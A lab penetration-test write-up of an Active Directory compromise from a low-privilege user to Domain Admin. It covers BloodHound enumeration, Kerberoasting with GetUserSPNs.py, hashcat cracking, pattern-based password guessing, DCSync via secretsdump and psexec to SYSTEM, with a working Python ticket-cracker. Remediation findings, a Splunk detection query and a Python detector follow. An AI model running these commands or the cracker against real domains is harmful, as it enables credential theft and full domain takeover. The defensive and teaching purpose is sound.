Complete Active Directory attack chain from an assumed-breach low-privilege domain user to full domain compromise — Kerberoasting, offline credential cracking, privilege escalation via over-privileged service account, and DCSync to extract all domain hashes.
| Field | Detail |
|---|---|
| Target | Internal Active Directory Network — domain: ad.lab |
| Scope | Complete domain compromise |
| Objective | Domain Admin access from low-privilege domain user |
| Attack Vector | Kerberoasting + credential cracking + privilege escalation |
| Difficulty | Medium–High |
| Starting Position | Assumed breach — credentials: john.smith:Welcome1! |
| Tools | BloodHound, Impacket, Hashcat, CrackMapExec, secretsdump.py, psexec.py |
Starting with low-privilege credentials from an assumed breach, BloodHound enumeration identified two Kerberoastable service accounts — svc_sql and svc_backup. Critically, svc_backup was a member of the Domain Admins group. The svc_sql TGS hash was extracted and cracked in 3 minutes 15 seconds. Password pattern analysis revealed the likely password for svc_backup, which was validated as a Domain Admin. A DCSync attack then extracted all domain hashes, including the krbtgt hash, achieving full domain compromise.
Starting from the assumed breach position with john.smith:Welcome1!, BloodHound was used for AD enumeration.
# Validate credentials and confirm domain connectivity
crackmapexec smb 10.80.80.2 -u john.smith -p Welcome1!
SMB 10.80.80.2 445 DC01 [+] AD.LAB\john.smith:Welcome1!
# Collect BloodHound data
bloodhound-python -d ad.lab -u john.smith -p Welcome1! -c All -ns 10.80.80.2
BloodHound analysis revealed two critical findings: two user accounts with registered SPNs, svc_sql and svc_backup, are Kerberoastable, and svc_backup is a member of Domain Admins, so cracking a single service-account password would be enough to compromise the domain.
Kerberoasting requests service tickets (TGS) for accounts with registered SPNs. The KDC encrypts the ticket's enc-part with the service account's long-term key; for RC4-HMAC (etype 23) that key is the account's NT hash, which is why tooling asks for RC4 tickets wherever the account allows it. The ticket is handed back to the requesting client, so the encrypted blob can be taken offline and candidate passwords tried against it with no further contact with the domain and no lockout risk. No special privileges are required beyond a valid domain account.
GetUserSPNs.py ad.lab/john.smith:Welcome1! -dc-ip 10.80.80.2 -request -outputfile kerberoast.hashes
ServicePrincipalName Name MemberOf
---------------------------- --------- -----------------------------------------
MSSQLSvc/dc01.ad.lab:1433 svc_sql
BackupSvc/dc01.ad.lab svc_backup CN=Domain Admins,CN=Users,DC=ad,DC=lab
[*] Total of 2 entries returned.
[*] Hash written to kerberoast.hashes
Both hashes were written out in Hashcat mode 13100 format ($krb5tgs$23$, i.e. RC4-HMAC tickets).
hashcat -m 13100 kerberoast.hashes /usr/share/wordlists/rockyou.txt --force
$krb5tgs$23$*svc_sql*:[hash]:SQLService1
Session..........: hashcat
Status...........: Cracked
Time.Estimated...: 0 secs (3 min, 15 secs elapsed)
Credentials for svc_sql obtained: svc_sql:SQLService1. The svc_backup hash was not cracked via wordlist — but password pattern analysis identified a critical pattern.
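To make the offline step concrete, the following is an added example (not a tool used on this engagement and not part of the original write-up): a minimal re-implementation of what Hashcat mode 13100 does with a $krb5tgs$23$ line. It builds a stand-in ticket for svc_sql under the page's password SQLService1, formats it the way GetUserSPNs.py does, then recovers the password from a small constructed wordlist. The confounder is fixed rather than random and the ASN.1 EncTicketPart is replaced by a placeholder blob so the script is reproducible offline; neither changes the RFC 4757 key derivation being demonstrated. The MD4 and RC4 routines are written out because hashlib's md4 is frequently unavailable under OpenSSL 3.

```python
"""Offline cracking of a Kerberoasted RC4-HMAC (etype 23) service ticket.

Added example (not from the original engagement). The password, confounder and
ticket body are constructed; the real ASN.1 EncTicketPart is replaced by a
placeholder blob, which does not change the RFC 4757 key derivation shown here.
"""
import hashlib
import hmac
import struct

MASK = 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); hashlib's md4 is often disabled under OpenSSL 3."""
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & MASK
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    rounds = (
        (f, 0x00000000, range(16), (3, 7, 11, 19)),
        (g, 0x5A827999, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13)),
        (h, 0x6ED9EBA1, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15)),
    )
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", len(data) * 8)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for fn, const, order, shifts in rounds:
            for i, k in enumerate(order):
                a = rotl((a + fn(b, c, d) + x[k] + const) & MASK, shifts[i % 4])
                a, b, c, d = d, a, b, c  # rotate so the next step updates the next register
        a, b, c, d = (a + aa) & MASK, (b + bb) & MASK, (c + cc) & MASK, (d + dd) & MASK
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> bytes:
    """NT hash = MD4(UTF-16LE(password)); for RC4-HMAC this is the Kerberos key itself."""
    return md4(password.encode("utf-16-le"))


def hmac_md5(key: bytes, msg: bytes) -> bytes:
    return hmac.new(key, msg, hashlib.md5).digest()


def rc4(key: bytes, data: bytes) -> bytes:
    s, j = list(range(256)), 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


KEY_USAGE_TICKET = 2  # key usage for the ticket enc-part in a TGS-REP (RFC 4120)


def rc4_hmac_encrypt(key, usage, plaintext, confounder):
    """RFC 4757 section 4: output = checksum || RC4(K3, confounder || plaintext)."""
    k1 = hmac_md5(key, struct.pack("<I", usage))
    data = confounder + plaintext
    checksum = hmac_md5(k1, data)  # K2 == K1 for the non-exportable RC4-HMAC variant
    return checksum + rc4(hmac_md5(k1, checksum), data)


def rc4_hmac_verify(key, usage, checksum, ciphertext):
    """Decrypt with a candidate key; return the plaintext only if the HMAC matches."""
    k1 = hmac_md5(key, struct.pack("<I", usage))
    data = rc4(hmac_md5(k1, checksum), ciphertext)
    return data[8:] if hmac.compare_digest(hmac_md5(k1, data), checksum) else None


def to_hashcat_13100(user, realm, spn, encpart):
    """$krb5tgs$23$*user$realm$spn*$<16-byte checksum>$<ciphertext>, as GetUserSPNs.py writes it."""
    return f"$krb5tgs$23$*{user}${realm}${spn}*${encpart[:16].hex()}${encpart[16:].hex()}"


def parse_hashcat_13100(line):
    ident, enc = line[len("$krb5tgs$23$*"):].split("*$", 1)
    user, realm, spn = ident.split("$", 2)
    checksum_hex, edata_hex = enc.split("$", 1)
    return user, realm, spn, bytes.fromhex(checksum_hex), bytes.fromhex(edata_hex)


def crack_tgs(line, wordlist):
    """The offline step: no KDC involved, one MD4, three HMAC-MD5 and one RC4 per guess."""
    _, _, _, checksum, edata = parse_hashcat_13100(line)
    for candidate in wordlist:
        if rc4_hmac_verify(nt_hash(candidate), KEY_USAGE_TICKET, checksum, edata) is not None:
            return candidate
    return None


# Constructed sample: a "ticket" for svc_sql issued under a password we chose ourselves.
SAMPLE_PASSWORD = "SQLService1"
CONFOUNDER = bytes(range(8))  # fixed instead of random so the sample line is reproducible
FAKE_ENC_TICKET_PART = b"\x63\x82\x01\x00placeholder EncTicketPart for svc_sql"
SAMPLE_LINE = to_hashcat_13100("svc_sql", "AD.LAB", "MSSQLSvc/dc01.ad.lab:1433",
    rc4_hmac_encrypt(nt_hash(SAMPLE_PASSWORD), KEY_USAGE_TICKET, FAKE_ENC_TICKET_PART, CONFOUNDER))
WORDLIST = ["Welcome1!", "Password1", "SQLService1", "BackupPass1!"]  # constructed mini wordlist

if __name__ == "__main__":
    print(SAMPLE_LINE)
    print("cracked:", crack_tgs(SAMPLE_LINE, WORDLIST))
```

Hashcat performs the same derivation per candidate (it short-cuts by checking the ASN.1 header of the decrypted data before the full HMAC). The cost per guess is one MD4 plus a few HMAC-MD5 and one RC4, which is why a weak service-account password falls in minutes; an AES ticket (etype 17 or 18) forces 4096 PBKDF2-HMAC-SHA1 iterations per guess, and a 25+ character random password is out of reach with either etype.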
# Validate svc_sql credentials
crackmapexec smb 10.80.80.2 -u svc_sql -p SQLService1
[+] AD.LAB\svc_sql:SQLService1
# Password pattern analysis: the cracked password follows <ServiceKeyword><Word><Digit>
# svc_sql → SQLService1 (keyword "SQL" + "Service" + "1")
# Candidates for svc_backup were built from the same convention (keyword "Backup" + Service/Pass
# + digit, with and without a trailing "!"). Each online guess is a logon attempt that counts
# towards the account lockout threshold, so check the policy first and keep the list short.
crackmapexec smb 10.80.80.2 -u svc_backup -p BackupPass1!
[+] AD.LAB\svc_backup:BackupPass1! (Pwn3d!)
svc_backup credentials validated as Domain Admin. (Pwn3d!) is CrackMapExec's marker for local administrator access on the target; on a domain controller that is equivalent to Domain Admin.
With Domain Admin credentials, a DCSync attack was performed. DCSync abuses Active Directory replication: the attacker impersonates a domain controller and asks DC01 over the DRSUAPI replication interface (GetNCChanges) for the credential attributes of every account, including the krbtgt hash used for Golden Ticket attacks. The request succeeds for any principal holding the DS-Replication-Get-Changes and DS-Replication-Get-Changes-All rights on the domain object, which Domain Admins, Enterprise Admins and domain controllers have by default, and no code is executed on the DC itself.
secretsdump.py ad.lab/svc_backup:BackupPass1!@10.80.80.2
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:[krbtgt_hash]:::
john.smith:1103:aad3b435b51404eeaad3b435b51404ee:[hash]:::
svc_sql:1104:aad3b435b51404eeaad3b435b51404ee:[hash]:::
svc_backup:1105:aad3b435b51404eeaad3b435b51404ee:[hash]:::
# ...all domain accounts extracted
# Remote code execution as SYSTEM
psexec.py ad.lab/svc_backup:BackupPass1!@10.80.80.2
C:\Windows\system32> whoami
nt authority\system
| # | Finding | Severity | Recommendation |
|---|---|---|---|
| 1 | svc_backup in Domain Admins — Kerberoastable service account with Domain Admin | Critical | Remove Domain Admin membership from service accounts; apply least-privilege principle |
| 2 | Weak service account passwords cracked in under 5 minutes | Critical | 25+ character random passwords for service accounts; implement gMSA (Group Managed Service Accounts) |
| 3 | Predictable password pattern across service accounts | High | Use randomly generated passwords with no organizational pattern; no shared naming conventions |
| 4 | Kerberoastable service accounts with weak passwords | High | 25+ character passwords for any account with SPNs; use gMSA where possible to eliminate manual password management |
| 5 | No Kerberoasting detection or alerting | Medium | Alert on Event ID 4769 with RC4 (0x17) ticket encryption for accounts that hold AES keys, and on any requester pulling tickets for many distinct SPNs in a short window; baseline normal TGS request volume per host |
| 6 | No credential hygiene — service accounts used for multiple services | High | Unique service account per application; no shared service credentials across services |
# Event ID 4769 — Kerberos Service Ticket Requested
# RC4 (etype 0x17) tickets for accounts that hold AES keys point at a Kerberoasting tool
# (modern clients negotiate AES; an RC4-only service account is always issued RC4, so
# the encryption type alone is not proof, and tools can request AES tickets instead)
# Computer accounts (ServiceName ending in $) and krbtgt are excluded as normal traffic
index=security EventCode=4769
TicketEncryptionType=0x17
NOT ServiceName="*$"
NOT ServiceName="krbtgt"
| stats count dc(ServiceName) AS distinct_spns by TargetUserName, IpAddress
| where count > 3
| sort -count
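The same detection logic, as an added example that is not part of the original report, run offline over constructed 4769 records. It reproduces the query above (RC4 service tickets, computer accounts and krbtgt excluded, more than three per requester) and adds the two caveats a SOC needs: RC4 is only counted for accounts known to hold AES keys, because an RC4-only account will always be issued RC4 tickets; and a requester pulling tickets for many distinct SPNs is flagged even when the tickets are AES (0x12), because roasting tools can ask for AES. The events, hosts and account names are constructed, and the AES-capable set stands in for what would be read from msDS-SupportedEncryptionTypes.

```python
"""Kerberoasting detection on Security event 4769, run offline over constructed events.

Added example, not from the original write-up. AES_CAPABLE would normally be built
from each service account's msDS-SupportedEncryptionTypes; here it is constructed.
"""
from collections import defaultdict

RC4_HMAC = "0x17"
AES_CAPABLE = {"svc_sql", "svc_backup", "svc_web", "svc_ldap", "svc_report", "svc_print"}


def ev(user, ip, service, etype):
    """One 4769 record using the field names of the XML-formatted Windows event."""
    return {"EventCode": 4769, "TargetUserName": user, "IpAddress": ip,
            "ServiceName": service, "TicketEncryptionType": etype}


EVENTS = [  # constructed
    # A: one workstation requesting RC4 tickets for four SPN accounts in a burst
    ev("john.smith@AD.LAB", "::ffff:10.80.80.50", "svc_sql", "0x17"),
    ev("john.smith@AD.LAB", "::ffff:10.80.80.50", "svc_backup", "0x17"),
    ev("john.smith@AD.LAB", "::ffff:10.80.80.50", "svc_web", "0x17"),
    ev("john.smith@AD.LAB", "::ffff:10.80.80.50", "svc_ldap", "0x17"),
    # B: the same sweep with AES tickets, which an RC4-only rule never sees
    *[ev("jane.doe@AD.LAB", "::ffff:10.80.80.51", s, "0x12") for s in sorted(AES_CAPABLE)],
    # C: ordinary traffic: AES to SQL, RC4 to a legacy RC4-only account, a computer account, krbtgt
    ev("bob.jones@AD.LAB", "::ffff:10.80.80.60", "svc_sql", "0x12"),
    ev("bob.jones@AD.LAB", "::ffff:10.80.80.60", "svc_legacy", "0x17"),
    ev("bob.jones@AD.LAB", "::ffff:10.80.80.60", "DC01$", "0x17"),
    ev("bob.jones@AD.LAB", "::ffff:10.80.80.60", "krbtgt", "0x12"),
]


def is_noise(e):
    """Computer accounts (trailing $) and krbtgt (TGT renewals) are not roast targets."""
    svc = e["ServiceName"]
    return svc.endswith("$") or svc.lower() == "krbtgt"


def kerberoast_alerts(events, rc4_threshold=3, spn_threshold=5, aes_capable=AES_CAPABLE):
    """Return one alert per (user, source IP) whose 4769 activity looks like roasting."""
    per_requester = defaultdict(lambda: {"rc4": 0, "spns": set()})
    for e in events:
        if e.get("EventCode") != 4769 or is_noise(e):
            continue
        stats = per_requester[(e["TargetUserName"], e["IpAddress"])]
        stats["spns"].add(e["ServiceName"])
        if e["TicketEncryptionType"] == RC4_HMAC and e["ServiceName"] in aes_capable:
            stats["rc4"] += 1  # RC4 where AES was available: the downgrade roasting tools ask for
    alerts = []
    for (user, ip), s in per_requester.items():
        reasons = []
        if s["rc4"] > rc4_threshold:
            reasons.append(f"{s['rc4']} RC4 tickets for AES-capable accounts")
        if len(s["spns"]) >= spn_threshold:
            reasons.append(f"{len(s['spns'])} distinct SPNs requested")
        if reasons:
            alerts.append({"user": user, "ip": ip, "reasons": reasons})
    return sorted(alerts, key=lambda a: a["user"])


if __name__ == "__main__":
    for a in kerberoast_alerts(EVENTS):
        print(a["user"], a["ip"], "; ".join(a["reasons"]))
```

Run as-is it reports john.smith's workstation for the RC4 burst and jane.doe's for the SPN sweep, and stays silent on bob.jones, whose single RC4 ticket went to an account that cannot do AES. In production the window (the `stats` time bucket in Splunk) matters as much as the thresholds: GetUserSPNs.py requests every ticket within a second or two, whereas legitimate clients spread requests across a session.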
| Technique ID | Technique |
|---|---|
| T1087.002 | Account Discovery: Domain Account — BloodHound user, group and session enumeration |
| T1482 | Domain Trust Discovery — trust data collected by BloodHound (-c All) |
| T1558.003 | Kerberoasting — TGS hash extraction from SPN accounts |
| T1110.002 | Password Cracking — offline hash cracking with Hashcat |
| T1078.002 | Valid Domain Accounts — service account credential abuse |
| T1003.006 | DCSync — domain credential dumping via replication abuse |